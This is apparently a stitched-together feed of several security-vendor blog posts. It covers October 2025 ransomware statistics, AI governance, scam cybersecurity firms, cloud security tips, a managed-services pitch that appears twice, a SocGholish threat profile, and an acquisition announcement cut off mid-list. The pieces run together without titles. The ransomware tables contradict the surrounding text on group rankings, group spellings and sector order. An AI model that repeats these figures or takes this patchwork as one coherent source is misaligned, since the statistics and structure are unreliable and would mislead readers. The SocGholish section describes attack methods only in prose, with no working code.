The US remained the primary recipient of ransomware attacks, but October saw manufacturing overtake technology as the most targeted vertical sector.

The ransomware information was derived from a new SpiderLabs ransomware-tracking tool that gathers information from a variety of open intelligence sources and our own proprietary research. 

This unique combination of open-source and in-house research provides new insights into ransomware attack trends, the threat groups involved, and their primary targets. The data is not all-inclusive but contains enough information to draw basic conclusions on the direction attacks are taking.

October Attack Figures

In October 2025, SpiderLabs recorded 722 ransomware attacks worldwide, up from 492 in September 2025 and 635 in October 2024.

As noted, the US was the nation most under attack with 298 incidents noted, followed by Canada and France with 45 and 25 attacks, respectively. 

Top 5 Threat Groups

Qlin again dominated the stage, but there were some changes in the top five list. Sinobi appeared in third place, pushing Incransom down to fourth and Play to fifth.

A quick breakdown of the new threat actor on the list:

• According to Ransomware.live, Sinobi became active in July 2025 and has so far specialized in attacking healthcare, manufacturing, and construction firms. 

Top Threat Groups for October 2025

Threat Groups Oct. 2025	Number of Attacks	Threat Groups Sept. 2025	Number of Attacks
Qilin	191 or 26.5%	Qlin	61 or 15.2%
Akira	71 or 9.8%	Akira	42 or 10.4%
Sinobi	62 or 8.6%	Sinobi	36 or 8.9%
Incransom	30 or 4.3%	Incransom	31 or 7.7%
Play	22 or 3.1%	Play	29 or 7.2%

Top Vertical Sectors Targeted for October 2025

Sector Oct. 2025	Number of Attacks as a %	Sector Sept. 2025	Number of Attacks as a %
Manufacturing	101 or 14%	Business Services	150 or 23.6%
Technology	76 or 10.5%	Manufacturing	84 or 13.2%
Healthcare	59 or 8.2%	Technology	79 or 12.4%
Business Services	33 or 4.6%	Healthcare	63 or 10%
Construction	29 or 4%	Government	38 or 6%

SpiderLabs’ research noted a major shift in targeting when data is examined year over year. In October of 2024, business services were the most often targeted vertical sector, followed by manufacturing and technology.

2025 Ransomware Attacks to Date

Threat Group	Number of Attacks	Target Sector	Number of Attacks
Qilin	724 or 11.6%	Manufacturing	726 or 11.7%
Akira	577 or 9.2%	Technology	735 or 11.7%
Sinobi	419 or 6.7%	Healthcare	420 or 6.8%
Incransom	332 or 5.3%	Business Services	334 or 5.3%
Play	283 or 4.5%	Financial Services	311 or 5%

Total attacks tracked to date for 2025 are 6,251, up dramatically from the 4,660 SpiderLabs saw in 2024. One data point from the target sector list to call out for October is manufacturing supplanted technology as the threat actor’s favorite victim sector. 

Defending Against Ransomware

Trustwave, A LevelBlue Company, offers a number of services and solutions to help organizations defend themselves against ransomware and recover if successfully attacked.

Trustwave’s Ransomware Preparedness service, unlike many offerings in the market today, doesn’t focus on singular aspects of a client’s security defense but looks at all critical lines of defense, using detailed insights and aggregated information to provide client security and business leaders. 

The service provides detailed assessments of the organization’s overall preparedness, an understanding of its existing capabilities to identify, respond to, and recover from a ransomware incident, and identification of the gaps, opportunities, and inherent risks it faces.

In addition, Trustwave can help with the basic mitigations all organizations should implement including:

• Enhance cybersecurity hygiene and patch management
• Implement robust backup and recovery plans
• Employee training and awareness
• Multi-Factor Authentication (MFA) and strong credential management
• Incident response planning

LevelBlue was recognized as a Major Player in the IDC MarketScape: Worldwide Extended Detection and Response Software 2025 Vendor Assessment ( September 2025, IDC #US52997325e.)

This recognition follows the analyst firm earlier this month naming Trustwave a Leader in the IDC MarketScape: APEJ Managed Detection and Response Services 2025 Vendor Assessment (doc #AP52998725, September 2025). LevelBlue acquired Trustwave in August 2025.

The IDC MarketScape noted, “LevelBlue is an evolution of both AT&T Cybersecurity approaches and a neat legacy company in AlienVault. AT&T (and now LevelBlue) historically competed as an MSSP against standalone cybersecurity providers and AlienVault targeted midsize businesses.” 

According to the report, “The LevelBlue USM Anywhere Platform is both highly customizable and easily personalized as well. The tiered pricing makes sense as midsize businesses vary from auto painting shops to online retailers that require a varying degree of digital presence. In addition, the attention that LevelBlue pays to FIPS 140-2 helps its partners offer products to the U.S. federal government. Midsize businesses, managed SPs, and MDRs are the sweet spot for LevelBlue.”

IDC MarketScape Highlights LevelBlue’s USM Anywhere Strengths

• The LevelBlue USM Anywhere is multifaceted. Owing to its AlienVault legacy, the platform includes an asset scanner, a device vulnerability scanner, user scanner, network and host (Windows/Linux/Mac) intrusion detection and response (NIDS/HIDS), global compliance reporting, a rules correlation engine, a centralized investigations panel, and visibility into on-premises and multicloud environments. All of these capabilities are included in the XDR solution and do not require additional modules.
• LevelBlue has strong integration partnerships. LevelBlue has 895 integrations and includes free builds — 60 of these integrations are bidirectional. Perhaps the most important of these integrations is with SentinelOne for endpoint EPP/EDR. This integration with LevelBlue provides identity protection with one-click device rollback capability but also adds LevelBlue detection rules and NIDS/HIDS detection for better alert granularity.
• To support integrations, LevelBlue offers webhooks and other multiple data collections for both integration into LevelBlue USM Anywhere and the creation of BlueApps. The platform offers different methods of integrations, including APIs, syslog-esque forwarded data, webhooks, and cloud connectors. API authentication schemes supported include Basic Auth, OAuth, HMAC, and API Keys and return formats include JSON, XML, and CSV. If taken as a whole, the various forms of interconnectedness allow LevelBlue USM Anywhere to include use cases for network monitoring, risk assessment, and additional telemetry such as firewall, application, and identity and access management logs to be included in detection and response rules. BlueApps are types of pre-integrations that are available such as BlueApps with Qualys and Tenable for vulnerability management and Akamai and Cloudflare for aspects of network security.
• The LevelBlue USM Anywhere offers over 2,500 detection and response rules. An advantage of being an MDR is that it has developed extensive in-the-field detection and response capabilities. User behavioral analytics may also find anomalies even before a threat is formally defined. The LevelBlue USM Anywhere platform tracks "alarms by intent." The alarm types are classified by system compromise, exploitation and installation, delivery and attack, reconnaissance and phishing, and environmental awareness.
• The end user receives high-fidelity alerts. LevelBlue maps to the MITRE ATT&CK framework encompassing 14 tactics and 135 subtechniques. The LevelBlue USM Anywhere platform includes the ability to customize detection and response rules. Drop-down menu options for rule creation include fields such as source name, destination name, and event activity. The rules can be implemented discretely or chained together. In addition, the end user can add suppression rules to reduce noise.
• Threat intelligence is an important component of the LevelBlue USM Anywhere. LevelBlue maintains the 15-year legacy of both LevelBlue Labs (formerly Alien Labs) and the OTX threat exchange. The open source OTX has 450,000 subscribers, and roughly one-third of those are from cybersecurity vendors. Roughly 20 million threat indicators, 400,000 threat artifacts, and 250,000 suspicious files are contributed or investigated daily. Threat intelligence libraries include charting industry-specific threats and mapping threats to malicious actors.
• USM Anywhere detection and response capabilities include on premises, AWS, Azure, and GCP. The same dashboard/platform provides visibility and actions in on-premises and the major cloud environments.
• AI and security automation turn insights into actions. The AI engine includes behavioral analytics that makes detections such as lateral movement and impossible travel possible. Response actions enable an agent to create an action, initiate a scan from an event, add a blocklist from an alarm, and disconnecting an asset from the network are automation ready.
• A tiered pricing model provides value for end users. There are four different types of pricing: Essentials, Standard, Premium, and Threat Detection and Response for Gov. The important differentiators between services include the number of days that hot storage is available, physical storage itself from gigabyte to terabyte, and access to BlueApps. For the Response for Gov service, FIPS 140-2–encrypted sensors are included, and it is U.S. FedRAMP authorized, with data storage in the AWS GovCloud (U.S.-West region) to address specific regulatory requirements.

This piece is part of a monthly series by Carisa Brockman and Bindu Sundaresan exploring the evolving world of AI governance, trust, and responsibility. Each month, we look at how organizations can use artificial intelligence safely, thoughtfully, and with lasting impact.

Introduction

Artificial intelligence has moved from being an experiment to becoming an expectation. It now shapes how decisions are made, how customers are supported, and how innovation happens. As AI grows in influence, so does the need to manage it wisely. The question is no longer whether to govern AI but how to build the kind of structure that encourages progress while protecting people and purpose.

Rethinking What Governance Means

Traditional governance models were designed for systems that behaved in predictable ways. AI does not follow that pattern. It learns, adapts, and sometimes surprises even its creators. This makes old methods based only on control and compliance too limited for today’s reality.

AI governance must now include fairness, transparency, and accountability. It is about making sure that AI decisions can be explained, that the data behind them is reliable, and that the outcomes reflect an organization’s values. The goal is not to limit AI but to guide it with purpose and care.

Traditional governance ensures systems do what they’re told.  AI governance ensures systems do what’s right and safely, fairly, and transparently.

Understanding Where the Risks Begin

AI risk is broader than a technical malfunction. It includes bias, misinformation, privacy issues, and reputational harm. Managing AI means recognizing all the places where things might go wrong, such as how the model learns, how it is maintained, and how people use it.

Looking at risk from these different angles helps leaders move from reacting to problems to anticipating and preventing them.

Leadership That Bridges Technology and Trust

AI governance is not the responsibility of one group and is not just a technology or security issue. It depends on cooperation amongst leadership, security, data, compliance, IT, and business teams. Each plays a part in making sure AI is developed responsibly and serves a clear purpose.

Security leaders, especially CISOs, are emerging as key connectors. Their work now reaches beyond protecting networks to making sure AI systems are secure, compliant, and ethically managed. They help set clear expectations for how AI tools are built, tested, and used. Governance becomes a shared practice instead of a barrier to progress.

Building a Culture of Responsible AI

Good governance starts with clarity. It involves documenting how AI systems are designed, how data is collected, and how decisions are reviewed. It also requires clear accountability so that every AI project has ownership and oversight. Most importantly, it relies on continuous learning because AI will keep evolving and so must the rules that guide it.

A practical starting point is to first understand your use cases and if AI is being used in your organization today.  Then the focus should be on high-impact or high-risk AI use cases. By assessing and monitoring those first, organizations can establish a structure that grows as adoption expands.

From Control to Confidence

Strong governance does not hold innovation back. It makes innovation safer to scale. When organizations build trust in their systems, they gain the freedom to explore new possibilities without losing control.

The goal of governance is not to slow AI down. It is to ensure that the appropriate guardrails are in place to enable progress sustainably and responsibly. AI has the power to transform entire industries, but that transformation must stay grounded in transparency, accountability, and human judgment.

When those values guide every step, AI can move society forward without leaving trust behind.

Why Every Organization Needs an AI Governance Framework

AI has the power to accelerate innovation, but without clear governance, it can also magnify risk. A well-designed AI governance framework brings structure, clarity, and accountability to how AI is used.

Here’s why it matters:

• It reduces immediate risks by preventing bias, data misuse, and privacy breaches.
• It establishes clear principles that guide how AI should be built, deployed, and monitored. 
• It improves system transparency, helping teams explain how AI makes decisions and ensuring fairness and accountability. 
• It aligns team understanding, creating shared clarity around AI goals, risks, and responsibilities.

It builds stakeholder trust, showing both internal teams and external audiences a commitment to ethical, secure, and compliant AI practices.

When governance is embedded early, AI becomes not just more reliable but more responsible. The result is technology that organizations can trust, scale, and stand behind.
 

It’s bad enough that organizations must worry about threat actors launching phishing attacks, injecting ransomware, or exploiting vulnerabilities; now, there is a new attack variant on the loose. Legal scammers.

These are companies, which seem to be emerging particularly in Australia, are set up and registered as legal cybersecurity firms, but in the end just take a company’s money without delivering any services.

Over the last few years, I have repeatedly encountered the same playbook being used: a polished cybersecurity business appears out of nowhere. 

It has a legitimate Australian Business Number (ABN), a slick website, a handful of convincing LinkedIn profiles, and a stream of topical articles (increasingly AI-assisted) about current breaches.

These are not your run-of-the-mill adversaries, but are highly sophisticated groups that, after a patient period of building credibility, contact organizations claiming to have “found your data on the dark web” or “identified critical vulnerabilities,” and apply pressure to set up an urgent call.

Using Scare Tactics

The scammer’s approach is deliberate. They create the façade of legitimacy, then add an emotional lever —usually fear —which is a very effective mechanism for persuading rushed decision-makers to pay for “help” they have not independently validated.

This is not theoretical. The techniques combine tried-and-tested social engineering practices with modern tools (automated content, purchased domain names, realistic but fake LinkedIn personas). 

The aim is not always to deliver genuine technical value; often, it is to create sufficient doubt and urgency that a target pays for remediation, removal, or “safe-keeping” of data.

Defending Against “Helpful” Scammers

The defensive response is simple in concept but must be practiced: pause, verify, demand evidence, and channel the contact through your incident response, legal and procurement processes.

Below I set out the practical checks that every CISO, CIO, and procurement lead should require before accepting unsolicited security claims — and a short “how to verify us” checklist at the end so you know exactly where to look if we (or any other provider) reach out.

A 10-Point Practical Vendor Verification Checklist (do these first)

1. Verify the legal entity (ABN / ACN / foreign company registration) — Confirm the ABN/ACN and the exact legal name via ABN Lookup (Australian Business Register).
2. Do not soley rely on the trading name on a website; the ABN record shows the registered entity and its status. For companies and business names, cross-check ASIC’s registers (company search, business names). ASIC records show lodged documents, business name holders, and foreign company registrations.
3. Check recognized cybersecurity accreditations and memberships.
4. For providers offering offensive testing (pen test, red team), look for CREST accreditation or similarly rigorous third-party endorsements and verify certificates via CREST’s verification service. For government or high-assurance work, verify whether the provider has demonstrated channels or relationships with the ACSC / ASD and follow ACSC guidance on incident reporting/assistance.
5. Verify ISO and other management certifications through the accreditation register — If a vendor claims ISO 27001 (or other ISO standards), verify the certificate on an accreditation-body register such as JAS-ANZ or the certifier’s public register — accredited certification bodies publish searchable registries. A certification logo on a website is not sufficient without registry verification.
6. Request and validate third-party assurance reports (SOC 2/ISAE 3402/penetration test reports) — SOC 2/ISAE reports are the industry standard for control assurance. A legitimate provider will either share a SOC 2/ISAE executive summary or provide a pathway to view the full report under NDA and will identify the auditing firm. Verify auditor credentials and insist on timeframes for the report.
7. Validate vendor partner claims (Microsoft, AWS, Google, etc.) — Partner logos are useful but verify them via vendor partner directories (for example, Microsoft’s partner directory / AppSource). Partner listings or solution designations can be confirmed through the cloud vendor’s official partner search pages.
8. Scrutinize LinkedIn and public personnel traces.  Look for depth of history, consistent timelines, verifiable past employers, and corporate email addresses. Recently created profiles, stock photos, or large clusters of newly created “employees” all signal risk. Use profile verification and open-source traces (conference talks, GitHub, published research) to corroborate expertise.
9. Demand technical artifacts and corroboration. If someone claims your data is “on the dark web” or that they have discovered a vulnerability, you must require specific, verifiable artefacts (for example, hashes, dated screenshots or logs with redactions) and then verify independently through your IR team or a trusted third-party.
10. Procurement and legal gates are not optional.  Insist on a statement of work, defined scope, contract terms, insurance details, and evidence of professional indemnity / cyber insurance. If the provider resists procurement/legal review or pressures for quick payment to “prevent exposure”, treat that as a red flag.

Where to Verify a Vendor’s Qualifications

Here is a short list of authoritative places (and how to use them)

• ABN Lookup / Australian Business Register — Search the ABN or company name to confirm registration, GST status, and entity name. Use ABR’s search to verify a business is active and matches invoices/contracts.
• ASIC registers (Companies and Business Names) — Search for lodged documents, company officers and business name holders to confirm who legally operates the business.
• ACSC/ASD guidance pages — If an unsolicited contact claims to be acting on behalf of national cyber services, instead reach out to ACSC channels for verification and advice. ACSC provides incident-support guidance and reporting processes.
• CREST/CREST verification — For offensive testing accreditations and individual practitioner certificates, use CREST approval lists and certificate verification.
• JAS-ANZ register and certifier registers — To confirm ISO 27001 and other management system certifications, search the JAS-ANZ register or the issuing certification body’s public lists.
• Cloud vendor partner directories — Verify partner status, advanced specializations and partner IDs via Microsoft AppSource / partner directory or the equivalent for AWS/GCP.
• SOC / auditor verification — Request SOC 2 or ISAE summaries, then confirm the auditor (Big 4 or recognized audit house) and that the report’s fieldwork and coverage match the services being offered.

Cloud computing is now central to company operations, but it can also be an opportunity for hackers. As of late last year, 80% of organizations experienced more frequent cloud attacks.[1] Strengthening security is essential. Clear, actionable cloud security tips help protect digital assets with minimal complexity.

As companies migrate more services and data to cloud environments, risks grow and become harder to detect. Understanding these risks and implementing proactive security strategies is crucial for adapting to the evolving threat landscape. That’s why adopting cloud computing security best practices not only helps prevent incidents but also strengthens internal and external trust in your digital infrastructure.

What Is Cloud Security?

Cloud computing adoption significantly grew during the rise of remote work in the pandemic. With storing confidential data in the cloud and more employees relying on personal and commercial devices to work remotely, organizations became more vulnerable, and the risk of cyberattacks increased.

Cloud security refers to a broad set of strategies and technologies designed to protect data, applications, and infrastructure hosted in the cloud. This system includes various tools, policies, and controls that safeguard cloud systems against unauthorized access, data leaks, and constantly evolving cyber threats.

How does cloud computing work? Essentially, it involves delivering IT services such as software over the internet. This allows companies to scale quickly and reduce IT costs. However, because these platforms are accessible online, cloud services are also susceptible to security risks.

To address these challenges, many organizations turn to specialized consultants to help design effective security strategies tailored to their cloud environments. Their role is to implement solutions that cover data protection, access management, and comprehensive security.

Key Objectives of Cloud IT Security Include:

• Protecting Data Privacy: Ensuring confidential information remains secure at all times.
• Managing Multicloud Security: Addressing the unique challenges of working with multiple cloud service providers (CSPs).
• Access Control: Restricting access and ensuring only authorized users, devices, and applications can interact with the cloud.

By implementing strong cloud security measures, organizations can significantly reduce their exposure to threats and maintain operational continuity. To achieve this, it’s important to identify and deploy the right security tools that address cloud-specific risks.

Secure Cloud Application: 5 Key Tools

Access credentials to cloud services are the first control point. They’re the gateway to all your information. That’s why implementing tools for a secure cloud application is essential. These solutions help manage access, prevent leaks, and ensure the integrity, confidentiality, and availability of your data. Following cloud security best practices will help you strengthen your cloud protection.

1. Implement Multi-Factor Authentication (MFA)

Hackers have many ways to access data and applications, but one of the most common is through stolen credentials. That’s why usernames and passwords alone are often insufficient to protect accounts from cyberattacks. This is where multi-factor authentication (MFA) comes in.

MFA is one of the most cost-effective and efficient security controls to ensure that only authorized personnel can log in. By requiring two or more verification methods, such as a password and a code sent to a mobile device, the risk of unauthorized access is drastically reduced. It’s also easy to implement and compatible with most current cloud services.

2. Manage User Access

Most employees don’t need access to all applications, information, or files within the cloud infrastructure. Setting appropriate authorization levels ensures that each employee can only view or access the data necessary for their role. Assigning access control not only prevents accidental data edits but also protects against hackers who may steal an employee’s credentials and gain access to sensitive areas of the system.

3. Provide Anti-Phishing Training to Teams

Hackers can steal credentials using social engineering techniques such as phishing, spoofing, and social media spying. Offering regular training on these scams is the best way to prevent employees from unintentionally compromising confidential data. Phishing remains one of the most effective methods for illegally accessing sensitive information. Implementing email security identifies phishing attempts before they cause harm. Training is essential, but combining it with specialized technology further reduces human risk in cloud environments.

4. Protect Hybrid Cloud Environments With CASB

With many companies using a combination of public and private clouds, as well as on-premises infrastructure to maximize efficiency, hackers are on the lookout for security blind spots and systems that aren’t integrated or tightly managed.

A Cloud Access Security Broker (CASB) is a network security tool that provides many benefits. It can increase visibility across both managed and unmanaged cloud servers, safeguard against costly data breaches, identify malicious activity before it escalates, and enables scanning to remediate threats across internal and external networks if an employee tries to share or upload an infected file.

5. Conduct Regular Penetration Testing

Penetration testing is a key tool for evaluating cloud security. It involves simulating controlled attacks to identify vulnerabilities, assess their impact, and verify the effectiveness of existing defenses. This type of analysis helps anticipate potential breaches and adjust strategies before real incidents occur.

Tests can be conducted by internal teams or outsourced to trusted providers, and costs vary depending on the type of test, duration, and size of the infrastructure. Including this exercise regularly in your security strategy helps maintain a proactive posture, adapted to technological changes and emerging attack methods.

Cloud Security: A Smart Investment With Expert Support

Cloud computing has become a scalable, cost-effective, and secure option for businesses of all sizes. However, its success depends on responsible implementation and a well-defined security strategy. Adopting best practices from the start allows you to enjoy its benefits without exposing sensitive data or compromising business continuity. But doing it alone can be complex.

Having the support of cybersecurity experts can make all the difference. Designing a secure multicloud architecture, budgeting for appropriate solutions, and providing ongoing management to protect your digital infrastructure are essential pieces if you want your investment to be worthwhile. At LevelBlue, we offer services designed to ease this transition, with solutions tailored to each environment and threat. 

References
1.    SentinelOne. (Nov 19, 2024). 50+ Cloud Security Statistics in 2025. SentinelOne
 

• Cybersecurity Awareness Month (CAM): Learn how partnering with an MSSP helps organizations meet the foundational security goals recommended by CISA.
• Managed Security Service Providers (MSSPs): Discover how an MSSP manages technical security burdens like vulnerability management, strong access controls, and MDR to achieve a "Culture of Cybersecurity."
• CISA's "Four Essentials": See how our solutions, including Managed Detection and Response (MDR), align with CISA's cybersecurity suggestions for resilience and incident response.

Cybersecurity Awareness Month (CAM) 2025 is well underway, and while the Cybersecurity and Infrastructure Security Agency (CISA) and the National Cybersecurity Alliance (NCSA) are pushing basic cyber hygiene tasks, there is another level organizations need to consider to remain secure and resilient.

Certainly, patching, strong passwords, and email security training are important, but is the organization capable of teaching these lessons or ensuring security is up to date? This is where partnering with a Managed Security Service Provider (MSSP) can help an organization attain the goals set by CISA and NCSA.

So, let’s take a dive into how Trustwave, a LevelBlue Company, and its MSSP solutions can help implement best cybersecurity practices and establish the "Culture of Cybersecurity" that CISA says is needed as part of its CAM security suggestions.

Mapping CISA’s Director to What an MSSP Delivers

As the world’s largest pure-play MSSP, we can keep an organization secure by acting as an extension of your security team to manage the technical burden, allowing the organization to focus on the human-centric goals of awareness month.

Here is the role an MSSP can play, based on the information provided by CISA:

1. Enabling Cybersecurity Awareness Training and Culture:

• Implementation Partner: CISA stresses the need to "Teach Employees to Avoid Phishing" and make security training a regular part of staff onboarding and ongoing development." An MSSP can directly provide or manage phishing simulation services and deliver the required "engaging cybersecurity training activities" to create the necessary culture of cybersecurity.
• Validation: The MSSP's security reporting and management services help "Evaluate the effectiveness of security trainings" by tracking security incidents and improving detection rates.

2. Managing the Technical "Four Essentials" and "Level Up Your Defenses.”

An MSSP manages and monitors the critical security controls CISA recommends, ensuring they are implemented correctly, which is the foundation that awareness efforts build upon. This includes:

• Identity and Access Management: Enforcing the requirements for Strong Passwords and managing Multifactor Authentication (MFA) across all business systems.
• Vulnerability Management: Ensuring systems are protected by promptly installing security updates and patches (CISA's Update Business Software recommendation).
• Monitoring and Response: Implementing and monitoring logging on business Systems to detect signs of malicious activity and handling the processes required to report cyber incident information to CISA when necessary.

Trustwave’s SpiderLabs team has decades of experience with helping implement Strong Access Controls: Trustwave's identity and access management solutions help healthcare organizations implement stringent access controls, such as Single Sign-On and Multifactor Authentication, ensuring that only authorized personnel can access patient data.

Trustwave’s managed vulnerability scanning service provides a programmatic approach to vulnerability management. It focuses on consistently identifying and addressing vulnerabilities across your organization's databases, networks, and applications. MVS takes the heavy lifting out of vulnerability scanning by managing all aspects of the process to help you achieve your security goals.

Trustwave’s Managed Detection and Response (MDR) and Co-Managed SOC (SIEM) conduct monitoring and logging through a systematic process involving collection, normalization, analysis, and includes an expert review process.

3. Building Resilience with Incident Response and Recovery:

The MSSP helps the organization create an incident response plan and, through its services, provides the tools to maintain Focus on continuity.

This includes managing the technical solutions for Back Up Business Data and verifying that critical systems can stay operational during an incident, which is a key component of being cyber-ready.

Trustwave’s Digital Forensics and Incident Response (DFIR) services and its elite SpiderLabs team of security experts deliver on building resilience with incident response and recovery by offering both proactive readiness and rapid reactive response.

• Incident Response Plan Development: They assist in creating or reviewing a formal Computer Security Incident Response Plan (CSIRP) that details roles, responsibilities, and procedures for responding to cyber incidents.
• Breach Preparedness and Training: This often involves conducting tabletop exercises and simulated exercises to test the organization's response plan and train staff to recognize indicators of compromise and respond effectively, ensuring the organization maintains a Focus on continuity.
• Capability Assessments: They assess your current detection and readiness capabilities, identifying gaps in your existing incident response procedures and security posture.

Please keep an eye out for the Trustwave blog for additional 2025 CAM blogs!

This blog is the latest in a series that delves into the deep research conducted daily by the Trustwave SpiderLabs Threat Operations team on major threat actor groups and malware currently operating globally.

Operating as a Malware-as-a-Service (MaaS)

SocGholish, also known as FakeUpdates, has been in service since 2017.

Distributed by the threat group TA569, SocGholish is best known for masquerading as a fake application update to trick users into downloading malicious files. TA569 has a tenuous connection to the Russian government through GRU Unit 29155, with Raspberry Robin as its payload. Additionally, TA569 offers Initial Access Broker (IAB) capabilities to those using the malware. The group’s motivation is primarily financial, as its business model revolves around enabling and profiting from follow-on compromises by other actors.

The impact of SocGholish is significant, primarily due to its ability to turn legitimate websites into large-scale distribution platforms for malware. Once executed, its payloads range from loaders and stealers to ransomware, allowing for extensive follow-up exploitation. This combination of broad reach, simple delivery mechanisms, and flexible use by multiple groups makes SocGholish a persistent and dangerous threat across industries and regions.

Customer List

One of SocGholish’s most notable users is Evil Corp, a Russian cybercriminal group with ties to Russian intelligence services, known for using multiple ransomware families, such as BitPaymer, WastedLocker, and LockBit. 

This makes SocGholish highly flexible as any threat actor can employ the malware in their respective campaigns. As a result, there is a wide range of threat actors who use SocGholish. 

In early 2025, SocGholish was used to distribute RansomHub, one of the most active ransomware variants, as part of its post-exploitation activities. This highlights SocGholish’s versatility as a delivery infrastructure capable of distributing a broad spectrum of payloads across multiple campaigns.

Methodology

SpiderLabs noted that SocGholish primarily targets end-user browsing activity, exploiting compromised websites to deliver its fake update prompts. Victims are then funneled through Traffic Distribution Systems (TDS) like Keitaro and Parrot TDS to filter users based on specific factors such as geography, browser type, or system configuration. This ensures that only the intended targets are exposed to the payload. 

In this way, the users become “assets” interacting with the web, and the compromised websites serve as the entry point for follow-up malware delivery.

Initial Compromise Techniques

• Compromising Websites: SocGholish primarily targets vulnerable WordPress sites by exploiting weaknesses, often through compromised "wp-admin" accounts. Attackers inject malicious scripts, such as ms_main_script-js, or distribute fake plugins and modified theme files to seamlessly blend the malware into the site's normal function.
• Domain Shadowing: Threat actors covertly create malicious subdomains on compromised legitimate domains. They achieve this by adding a new address record (A record) to the domain's DNS, leveraging the parent domain's trust to bypass security detection.

Targeting and Evasion

SocGholish heavily utilizes TDS, specifically Parrot TDS (using keywords like ndsj, ndsw, and ndsx) and Keitaro TDS, to filter and refine its victims.

• Victim Profiling: The TDS collects system info, IP, and geolocation data to determine if a user is a suitable target.
• Evasion: It employs behavioral checks to detect and avoid sandboxes or virtualized environments. It also uses cookies to redirect repeat visitors to benign content and validate referrer and URL formats, ensuring only genuine targets receive the malicious payload.

Infection Chain

The core of the attack relies on social engineering and a malicious JavaScript loader.

• Fake Updates: Attackers trick victims into clicking prompts disguised as legitimate software updates (e.g., for a web browser or Flash Player). The messages are often tailored to the victim's specific browser and version for increased credibility.
• Malicious JavaScript: The downloaded malicious JavaScript file typically acts as a loader. It establishes a command-and-control (C2) connection for further instructions. In other variants, the script profiles the infected system and network before receiving the final payload.

Follow-On Payloads

As noted, SocGholish's main function is to provide initial access for other criminal groups. Once a system is infected, it can drop a wide range of malware, including:

• Ransomware: Such as RansomHub and LockBit.
• Remote Access Trojans (RATs): Including AsyncRAT and NetSupport.
• Loaders/Stealers: Like MintsLoader, RedLine Stealer, and Dridex.

SocGholish represents a significant threat to all organizations leveraging tactics that exploit user trust and legitimate web infrastructure. Its ability to adapt to various target sectors and regions, coupled with its straightforward delivery methods, underscores its prevalence among threat actors, including notorious groups like Evil Corp.

• Cybersecurity Awareness Month (CAM): Learn how partnering with an MSSP helps organizations meet the foundational security goals recommended by CISA.
• Managed Security Service Providers (MSSPs): Discover how an MSSP manages technical security burdens like vulnerability management, strong access controls, and MDR to achieve a "Culture of Cybersecurity."
• CISA's "Four Essentials": See how our solutions, including Managed Detection and Response (MDR), align with CISA's cybersecurity suggestions for resilience and incident response.

Cybersecurity Awareness Month (CAM) 2025 is well underway, and while the Cybersecurity and Infrastructure Security Agency (CISA) and the National Cybersecurity Alliance (NCSA) are pushing basic cyber hygiene tasks, there is another level organizations need to consider to remain secure and resilient.

Certainly, patching, strong passwords, and email security training are important, but is the organization capable of teaching these lessons or ensuring security is up to date? This is where partnering with a Managed Security Service Provider (MSSP) can help an organization attain the goals set by CISA and NCSA.

So, let’s take a dive into how Trustwave, a LevelBlue Company, and its MSSP solutions can help implement best cybersecurity practices and establish the "Culture of Cybersecurity" that CISA says is needed as part of its CAM security suggestions.

Mapping CISA’s Director to What an MSSP Delivers

As the world’s largest pure-play MSSP, we can keep an organization secure by acting as an extension of your security team to manage the technical burden, allowing the organization to focus on the human-centric goals of awareness month.

Here is the role an MSSP can play, based on the information provided by CISA:

1. Enabling Cybersecurity Awareness Training and Culture:

• Implementation Partner: CISA stresses the need to "Teach Employees to Avoid Phishing" and make security training a regular part of staff onboarding and ongoing development." An MSSP can directly provide or manage phishing simulation services and deliver the required "engaging cybersecurity training activities" to create the necessary culture of cybersecurity.
• Validation: The MSSP's security reporting and management services help "Evaluate the effectiveness of security trainings" by tracking security incidents and improving detection rates.

2. Managing the Technical "Four Essentials" and "Level Up Your Defenses.”

An MSSP manages and monitors the critical security controls CISA recommends, ensuring they are implemented correctly, which is the foundation that awareness efforts build upon. This includes:

• Identity and Access Management: Enforcing the requirements for Strong Passwords and managing Multifactor Authentication (MFA) across all business systems.
• Vulnerability Management: Ensuring systems are protected by promptly installing security updates and patches (CISA's Update Business Software recommendation).
• Monitoring and Response: Implementing and monitoring logging on business Systems to detect signs of malicious activity and handling the processes required to report cyber incident information to CISA when necessary.

Trustwave’s SpiderLabs team has decades of experience with helping implement Strong Access Controls: Trustwave's identity and access management solutions help healthcare organizations implement stringent access controls, such as Single Sign-On and Multifactor Authentication, ensuring that only authorized personnel can access patient data.

Trustwave’s managed vulnerability scanning service provides a programmatic approach to vulnerability management. It focuses on consistently identifying and addressing vulnerabilities across your organization's databases, networks, and applications. MVS takes the heavy lifting out of vulnerability scanning by managing all aspects of the process to help you achieve your security goals.

Trustwave’s Managed Detection and Response (MDR) and Co-Managed SOC (SIEM) conduct monitoring and logging through a systematic process involving collection, normalization, analysis, and includes an expert review process.

3. Building Resilience with Incident Response and Recovery:

The MSSP helps the organization create an incident response plan and, through its services, provides the tools to maintain Focus on continuity.

This includes managing the technical solutions for Back Up Business Data and verifying that critical systems can stay operational during an incident, which is a key component of being cyber-ready.

Trustwave’s Digital Forensics and Incident Response (DFIR) services and its elite SpiderLabs team of security experts deliver on building resilience with incident response and recovery by offering both proactive readiness and rapid reactive response.

• Incident Response Plan Development: They assist in creating or reviewing a formal Computer Security Incident Response Plan (CSIRP) that details roles, responsibilities, and procedures for responding to cyber incidents.
• Breach Preparedness and Training: This often involves conducting tabletop exercises and simulated exercises to test the organization's response plan and train staff to recognize indicators of compromise and respond effectively, ensuring the organization maintains a Focus on continuity.
• Capability Assessments: They assess your current detection and readiness capabilities, identifying gaps in your existing incident response procedures and security posture.

Please keep an eye out for the Trustwave blog for additional 2025 CAM blogs!

Today marks a strategic leap forward in LevelBlue’s mission to become the most complete cybersecurity partner on the market. I’m excited to announce that LevelBlue has entered into a definitive agreement to acquire Cybereason, a global leader in Extended Detection and Response (XDR), digital forensics and incident response (DFIR), and elite threat intelligence. Together we’ll deliver unified, proactive, and outcome-driven security solutions around the globe.

Why Cybereason? Why Now?

Cybereason’s advanced XDR platform, backed by a world-class team and global reputation for innovation, is the perfect complement to LevelBlue’s AI-powered managed detection and response (MDR) and our recently acquired expertise from Trustwave and Stroz Friedberg. Cybereason achieved a perfect score in the 2024 MITRE ATT&CK Evaluations, proving the technology’s unmatched precision and effectiveness against today’s most complex cyber threats.

The combination of these capabilities will allow us to offer faster, more accurate detection and response, significantly reducing threat dwell times and containing threats before they spread. 

Advancing Our Strategy: Benefits for Clients, Partners, and Markets

For our clients and strategic partners, this union means more than just enhanced technology – it delivers immediate and tangible benefits: 

